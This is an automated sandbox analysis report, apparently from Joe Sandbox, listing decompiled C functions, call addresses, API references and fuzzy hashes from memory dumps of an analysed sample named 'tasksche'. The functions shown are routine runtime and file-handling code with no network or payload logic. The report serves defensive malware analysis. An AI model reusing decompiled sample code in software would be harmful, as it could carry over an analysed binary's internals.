                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 4254904621-0
                                                                                              • Opcode ID: f4a0015dd81c6367a1e3723969d7ed7b71eec4aecea33b784c0cc5c9c2fc540f
                                                                                              • Instruction ID: 4fa22713ff1b1cd4263d7298948381a35fc14f9b7bb01a12f51cc5b8ed2a70ee
                                                                                              • Opcode Fuzzy Hash: f4a0015dd81c6367a1e3723969d7ed7b71eec4aecea33b784c0cc5c9c2fc540f
                                                                                              • Instruction Fuzzy Hash: B401ADB2A107009AC7109FAAC44029AF7E9FF94310F00842FE459D3390D7B8A9408B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00408E03(intOrPtr* __ecx, void* __edx) {
                                                                                              				void* _t19;
                                                                                              				void* _t23;
                                                                                              				void* _t34;
                                                                                              				void* _t38;
                                                                                              
                                                                                              				E0041A4DC(E00429705, _t38);
                                                                                              				E0040117B(_t38 - 0x1c, __edx, __ecx);
                                                                                              				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                                                              				 *((intOrPtr*)( *__ecx + 0xc))();
                                                                                              				_t19 =  *((intOrPtr*)( *__ecx + 0x10))();
                                                                                              				 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
                                                                                              				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t38 - 0x1c)))) + 0xc))( *((intOrPtr*)(_t38 - 0x14)),  *((intOrPtr*)(_t38 - 0x10)), 0, 0, 0, 2, _t34, _t23);
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t38 - 0xc));
                                                                                              				return _t19;
                                                                                              			}







                                                                                              0x00408e08
                                                                                              0x00408e18
                                                                                              0x00408e1f
                                                                                              0x00408e2b
                                                                                              0x00408e32
                                                                                              0x00408e38
                                                                                              0x00408e4a
                                                                                              0x00408e56
                                                                                              0x00408e5e

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 863cc4a6e1e3a3a4d87e432309fddcfd3b8ff728f9b2f9572ac3dc0eeb2e4462
                                                                                              • Instruction ID: bd93042bfc1aad2116d0877f42dabf9818625296a81febac24436190ec2c14aa
                                                                                              • Opcode Fuzzy Hash: 863cc4a6e1e3a3a4d87e432309fddcfd3b8ff728f9b2f9572ac3dc0eeb2e4462
                                                                                              • Instruction Fuzzy Hash: 33F04F35B00214AFD7149F58C889FADB7B5EF48724F208159E912A73D1CB749D008A54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E00408A32(void* __ecx) {
                                                                                              				void* _t9;
                                                                                              				int _t12;
                                                                                              				void* _t13;
                                                                                              				void* _t19;
                                                                                              
                                                                                              				_t19 = __ecx;
                                                                                              				_t9 =  *(__ecx + 4);
                                                                                              				_t13 = 1;
                                                                                              				if(_t9 != 0xffffffff) {
                                                                                              					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
                                                                                              						_t12 = FindCloseChangeNotification(_t9); // executed
                                                                                              						asm("sbb bl, bl");
                                                                                              						_t13 =  ~(_t12 - 1) + 1;
                                                                                              					}
                                                                                              					 *(_t19 + 4) =  *(_t19 + 4) | 0xffffffff;
                                                                                              				}
                                                                                              				 *(_t19 + 0xc) =  *(_t19 + 0xc) & 0x00000000;
                                                                                              				if(_t13 == 0 &&  *((intOrPtr*)(_t19 + 0x14)) != _t13) {
                                                                                              					E004063E1(0x4335ac, _t19 + 0x1e);
                                                                                              				}
                                                                                              				return _t13;
                                                                                              			}







                                                                                              0x00408a34
                                                                                              0x00408a36
                                                                                              0x00408a39
                                                                                              0x00408a3e
                                                                                              0x00408a44
                                                                                              0x00408a4d
                                                                                              0x00408a58
                                                                                              0x00408a5a
                                                                                              0x00408a5a
                                                                                              0x00408a5c
                                                                                              0x00408a5c
                                                                                              0x00408a60
                                                                                              0x00408a66
                                                                                              0x00408a76
                                                                                              0x00408a76
                                                                                              0x00408a7f

                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNELBASE(?,74CEF370,00000000,0040868D,?,?,?,?,00407427,?,00000000,?,00000800,?,?,?), ref: 00408A4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotification
                                                                                              • String ID:
                                                                                              • API String ID: 2591292051-0
                                                                                              • Opcode ID: b21f32aa194ba9df83e0161a33b0e827325d82f6e4b9bdb228d687f297159138
                                                                                              • Instruction ID: ad6283f58ebf58fc73997c28fab75cfea7daa8eae0e70c9973603df5d86841c1
                                                                                              • Opcode Fuzzy Hash: b21f32aa194ba9df83e0161a33b0e827325d82f6e4b9bdb228d687f297159138
                                                                                              • Instruction Fuzzy Hash: 55F027706427044FD73056384A4879333D85B16331F049B2FD8E2A3BC0CB7898894E64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E00405512(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags) {
                                                                                              				void* _t38;
                                                                                              
                                                                                              				E0041A4DC(E004295E1, _t38);
                                                                                              				_push(__ecx);
                                                                                              				 *((intOrPtr*)(_t38 - 0x10)) = __ecx;
                                                                                              				E0040A026(__ecx, __edi); // executed
                                                                                              				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                                                              				E00410D8E(__ecx + 0x92d4);
                                                                                              				 *(_t38 - 4) = 1;
                                                                                              				E00410D8E(__ecx + 0x9330);
                                                                                              				 *(_t38 - 4) = 2;
                                                                                              				E00410D8E(__ecx + 0x938c);
                                                                                              				 *(_t38 - 4) = 3;
                                                                                              				E00410D8E(__ecx + 0x93e8);
                                                                                              				 *(_t38 - 4) = 4;
                                                                                              				E00410D8E(__ecx + 0x9444);
                                                                                              				 *(_t38 - 4) = 5;
                                                                                              				E00405394(__ebx, __ecx, __edi,  *(_t38 - 4));
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t38 - 0xc));
                                                                                              				return __ecx;
                                                                                              			}




                                                                                              0x00405517
                                                                                              0x0040551c
                                                                                              0x00405520
                                                                                              0x00405523
                                                                                              0x00405528
                                                                                              0x00405532
                                                                                              0x0040553d
                                                                                              0x00405541
                                                                                              0x0040554c
                                                                                              0x00405550
                                                                                              0x0040555b
                                                                                              0x0040555f
                                                                                              0x0040556a
                                                                                              0x0040556e
                                                                                              0x00405575
                                                                                              0x00405579
                                                                                              0x00405584
                                                                                              0x0040558c

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00405517
                                                                                                • Part of subcall function 0040A026: __EH_prolog.LIBCMT ref: 0040A02B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 8d7273e43c00e3d352773117abe9a80c711290f191c18f656fba03e9df2d1900
                                                                                              • Instruction ID: fa77f21fc7194b1e08a14eb3a2c561e3cb85337c9bb77c22dcaa42305da5d14c
                                                                                              • Opcode Fuzzy Hash: 8d7273e43c00e3d352773117abe9a80c711290f191c18f656fba03e9df2d1900
                                                                                              • Instruction Fuzzy Hash: A2013130901694DAD715EBA5D1157DDB7B49F14308F00449FE456532C3DFF82B84CB66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004096BC(intOrPtr __edx, WCHAR* _a4, intOrPtr _a8) {
                                                                                              				void* _t11;
                                                                                              				intOrPtr _t21;
                                                                                              
                                                                                              				_t21 = _a8;
                                                                                              				 *((char*)(_t21 + 0x1044)) = 0;
                                                                                              				if(E0040A0A4(_a4) == 0) {
                                                                                              					_t11 = E00409476(__edx, 0xffffffff, _a4, _t21); // executed
                                                                                              					if(_t11 == 0xffffffff) {
                                                                                              						goto L1;
                                                                                              					}
                                                                                              					FindClose(_t11); // executed
                                                                                              					 *(_t21 + 0x1040) =  *(_t21 + 0x1040) & 0x00000000;
                                                                                              					 *((char*)(_t21 + 0x100c)) = E0040901C( *((intOrPtr*)(_t21 + 0x1008)));
                                                                                              					 *((char*)(_t21 + 0x100d)) = E00409034( *((intOrPtr*)(_t21 + 0x1008)));
                                                                                              					return 1;
                                                                                              				}
                                                                                              				L1:
                                                                                              				return 0;
                                                                                              			}





                                                                                              0x004096bd
                                                                                              0x004096c5
                                                                                              0x004096d3
                                                                                              0x004096e0
                                                                                              0x004096e8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004096ec
                                                                                              0x004096f2
                                                                                              0x00409708
                                                                                              0x00409713
                                                                                              0x00000000
                                                                                              0x0040971b
                                                                                              0x004096d5
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 0040A0A4: _wcspbrk.LIBCMT ref: 0040A0B5
                                                                                              • FindClose.KERNELBASE(00000000,00000800,000000FF,?,?,?,?,00408411,?,?,00000000,?,00000800), ref: 004096EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseFind_wcspbrk
                                                                                              • String ID:
                                                                                              • API String ID: 2190230203-0
                                                                                              • Opcode ID: 85123c6e94d2e517bbdffd63dea6bf8ab785228859dafa86eb4c7b41f0ab578b
                                                                                              • Instruction ID: c5db38677187ea9b8dec244fb3c8af9ff7d0a6647eff614e001a313c4cd0766c
                                                                                              • Opcode Fuzzy Hash: 85123c6e94d2e517bbdffd63dea6bf8ab785228859dafa86eb4c7b41f0ab578b
                                                                                              • Instruction Fuzzy Hash: 21F09635005380ABCA225B658404AC77B945F55365F048A1EB1F9621D7C279545ADB26
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E00407074(intOrPtr __ecx) {
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t11;
                                                                                              				void* _t14;
                                                                                              				intOrPtr _t21;
                                                                                              				intOrPtr _t24;
                                                                                              				void* _t26;
                                                                                              
                                                                                              				E0041A4DC(E0042966D, _t26);
                                                                                              				_push(__ecx);
                                                                                              				_t24 = __ecx;
                                                                                              				 *((intOrPtr*)(_t26 - 0x10)) = __ecx;
                                                                                              				_t21 =  *((intOrPtr*)(__ecx + 0x4448));
                                                                                              				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                                                                                              				_t29 = _t21;
                                                                                              				if(_t21 != 0) {
                                                                                              					E004155EF(_t14, _t21, _t21); // executed
                                                                                              					E0041A4FB(_t14, _t21, __ecx, _t29, _t21); // executed
                                                                                              				}
                                                                                              				_t5 = _t26 - 4;
                                                                                              				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
                                                                                              				_t11 = E00401001(_t24 + 0x10,  *_t5);
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t26 - 0xc));
                                                                                              				return _t11;
                                                                                              			}










                                                                                              0x00407079
                                                                                              0x0040707e
                                                                                              0x00407080
                                                                                              0x00407083
                                                                                              0x00407086
                                                                                              0x0040708c
                                                                                              0x00407090
                                                                                              0x00407092
                                                                                              0x00407096
                                                                                              0x0040709c
                                                                                              0x004070a1
                                                                                              0x004070a2
                                                                                              0x004070a2
                                                                                              0x004070a9
                                                                                              0x004070b3
                                                                                              0x004070bb

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00407079
                                                                                                • Part of subcall function 004155EF: __EH_prolog.LIBCMT ref: 004155F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 87706284f8ccbc03753738a0be538c99bba682efd2688e5f1f5aa8a82baee0a0
                                                                                              • Instruction ID: da238740c98ae75ebc3f5927faf798116ad114c2e9bc9b884e51ec1b39bdab83
                                                                                              • Opcode Fuzzy Hash: 87706284f8ccbc03753738a0be538c99bba682efd2688e5f1f5aa8a82baee0a0
                                                                                              • Instruction Fuzzy Hash: D1E06D32A11610ABC715AB29C4066EEF3B9EFC0728F10422FA062636C1DBB86D418659
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 75%
                                                                                              			E00410DDE() {
                                                                                              				void* _t2;
                                                                                              
                                                                                              				L00411982(); // executed
                                                                                              				_t2 = E0041197C();
                                                                                              				if(_t2 != 0) {
                                                                                              					_t2 = E00406371(0x4335ac, 0xff);
                                                                                              				}
                                                                                              				if( *0x4335b7 != 0) {
                                                                                              					_t2 = E00406371(0x4335ac, 0xff);
                                                                                              				}
                                                                                              				__imp__SetThreadExecutionState(1);
                                                                                              				return _t2;
                                                                                              			}




                                                                                              0x00410de0
                                                                                              0x00410de5
                                                                                              0x00410df6
                                                                                              0x00410dfb
                                                                                              0x00410dfb
                                                                                              0x00410e07
                                                                                              0x00410e0c
                                                                                              0x00410e0c
                                                                                              0x00410e13
                                                                                              0x00410e1b

                                                                                              APIs
                                                                                              • SetThreadExecutionState.KERNEL32 ref: 00410E13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecutionStateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2211380416-0
                                                                                              • Opcode ID: 99114e7ac6e4293e68323f01352a3d081b9a398302f12d6f006bb62c0eb9cb63
                                                                                              • Instruction ID: ce8ef4de1523c5d0242b00cb845f3d850d1a93a8e5a83f46045a12d46b5ed054
                                                                                              • Opcode Fuzzy Hash: 99114e7ac6e4293e68323f01352a3d081b9a398302f12d6f006bb62c0eb9cb63
                                                                                              • Instruction Fuzzy Hash: 62D0C23170015022CA213B2B2815BEE56194F81724F0900BFB501622E38EAC09C281EE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 79%
                                                                                              			E00409720(void* __ebx, void* __ecx, char _a4) {
                                                                                              				void* __edi;
                                                                                              				intOrPtr _t7;
                                                                                              				void* _t11;
                                                                                              				void* _t12;
                                                                                              				void* _t15;
                                                                                              
                                                                                              				_t18 = _a4;
                                                                                              				_t15 = __ecx;
                                                                                              				 *((char*)(__ecx + 8)) = 0;
                                                                                              				if(_a4 == 0) {
                                                                                              					_t4 = __ecx + 0xc;
                                                                                              					 *_t4 =  *(__ecx + 0xc) & 0x00000000;
                                                                                              					__eflags =  *_t4;
                                                                                              				} else {
                                                                                              					_t7 = E0041A0EA(__ebx, _t11, 0x8003, _t18, 0x8003, _t12); // executed
                                                                                              					 *((intOrPtr*)(_t15 + 0xc)) = _t7;
                                                                                              					E0041A820(0x8003, _t7, 0, 0x8003);
                                                                                              				}
                                                                                              				return _t15;
                                                                                              			}








                                                                                              0x00409720
                                                                                              0x00409726
                                                                                              0x00409728
                                                                                              0x0040972c
                                                                                              0x0040974c
                                                                                              0x0040974c
                                                                                              0x0040974c
                                                                                              0x0040972e
                                                                                              0x00409735
                                                                                              0x0040973e
                                                                                              0x00409741
                                                                                              0x00409749
                                                                                              0x00409753

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID:
                                                                                              • API String ID: 2102423945-0
                                                                                              • Opcode ID: c61d5f3dc6c1f9b97ffe444c65296dc1c5881d1e0fbf0653a527c25b506bb31f
                                                                                              • Instruction ID: 57c48ace6bef99692c10c7cc37c4410ce12e8001caaa4568d5ee7d388360cf58
                                                                                              • Opcode Fuzzy Hash: c61d5f3dc6c1f9b97ffe444c65296dc1c5881d1e0fbf0653a527c25b506bb31f
                                                                                              • Instruction Fuzzy Hash: D7E0CD729053406AD371751D9C04F579AD85B95725F14C82FB089A32C3C1BC5C51C759
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0041EDF7(intOrPtr _a4) {
                                                                                              				void* _t6;
                                                                                              
                                                                                              				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                              				 *0x44f848 = _t6;
                                                                                              				if(_t6 != 0) {
                                                                                              					 *0x451420 = 1;
                                                                                              					return 1;
                                                                                              				} else {
                                                                                              					return _t6;
                                                                                              				}
                                                                                              			}




                                                                                              0x0041ee0c
                                                                                              0x0041ee12
                                                                                              0x0041ee19
                                                                                              0x0041ee20
                                                                                              0x0041ee26
                                                                                              0x0041ee1c
                                                                                              0x0041ee1c
                                                                                              0x0041ee1c

                                                                                              APIs
                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041EE0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 10892065-0
                                                                                              • Opcode ID: 6c78c704c61e396e770c5c9d5bf39bc32bfab303bf8d18d204e2a82309729daa
                                                                                              • Instruction ID: eb53d8fa6b9c670d76401f9b6e634384cdf5b6bc28e7f080834842f41bea832e
                                                                                              • Opcode Fuzzy Hash: 6c78c704c61e396e770c5c9d5bf39bc32bfab303bf8d18d204e2a82309729daa
                                                                                              • Instruction Fuzzy Hash: E6D05E366503485ADB106F716C09B763BDCD384396F104436BC1DC6150F775C5A09A48
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00408C5A(void* __ecx) {
                                                                                              				void* _t2;
                                                                                              				long _t3;
                                                                                              
                                                                                              				_t2 =  *(__ecx + 4);
                                                                                              				if(_t2 != 0xffffffff) {
                                                                                              					_t3 = GetFileType(_t2); // executed
                                                                                              					if(_t3 == 2 || _t3 == 3) {
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						return 0;
                                                                                              					}
                                                                                              				} else {
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}





                                                                                              0x00408c5a
                                                                                              0x00408c60
                                                                                              0x00408c66
                                                                                              0x00408c6f
                                                                                              0x00408c7c
                                                                                              0x00408c76
                                                                                              0x00408c78
                                                                                              0x00408c78
                                                                                              0x00408c62
                                                                                              0x00408c64
                                                                                              0x00408c64

                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(?,00408CDA,?,00408EB0,?,00000000,?,?,00000000), ref: 00408C66
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: b9077224b9f88db5cd0ce6d94ac7233058a1c10921077028cad7c3ce69d3e2a2
                                                                                              • Instruction ID: 2361e1c995e4a541e26ad64c94d2af3b89e31d8e4072a4a2db2c19a8efa4df55
                                                                                              • Opcode Fuzzy Hash: b9077224b9f88db5cd0ce6d94ac7233058a1c10921077028cad7c3ce69d3e2a2
                                                                                              • Instruction Fuzzy Hash: 8EC0127151610056DF2046385A8845B376687433667789FF9E071D12E5CB3ECC56B025
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 75%
                                                                                              			E0041C993(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				intOrPtr _t9;
                                                                                              				void* _t18;
                                                                                              
                                                                                              				_push(0xc);
                                                                                              				_push(0x42d6f8);
                                                                                              				E0041FA9C(__ebx, __edi, __esi);
                                                                                              				E00421501();
                                                                                              				 *(_t18 - 4) =  *(_t18 - 4) & 0x00000000;
                                                                                              				_t9 = E0041C8A8(__edx,  *((intOrPtr*)(_t18 + 8))); // executed
                                                                                              				 *((intOrPtr*)(_t18 - 0x1c)) = _t9;
                                                                                              				 *(_t18 - 4) = 0xfffffffe;
                                                                                              				E0041C9C9();
                                                                                              				return E0041FAE1( *((intOrPtr*)(_t18 - 0x1c)));
                                                                                              			}





                                                                                              0x0041c993
                                                                                              0x0041c995
                                                                                              0x0041c99a
                                                                                              0x0041c99f
                                                                                              0x0041c9a4
                                                                                              0x0041c9ab
                                                                                              0x0041c9b1
                                                                                              0x0041c9b4
                                                                                              0x0041c9bb
                                                                                              0x0041c9c8

                                                                                              APIs
                                                                                                • Part of subcall function 00421501: __lock.LIBCMT ref: 00421503
                                                                                              • __onexit_nolock.LIBCMT ref: 0041C9AB
                                                                                                • Part of subcall function 0041C8A8: __decode_pointer.LIBCMT ref: 0041C8B7
                                                                                                • Part of subcall function 0041C8A8: __decode_pointer.LIBCMT ref: 0041C8C7
                                                                                                • Part of subcall function 0041C8A8: __msize.LIBCMT ref: 0041C8E5
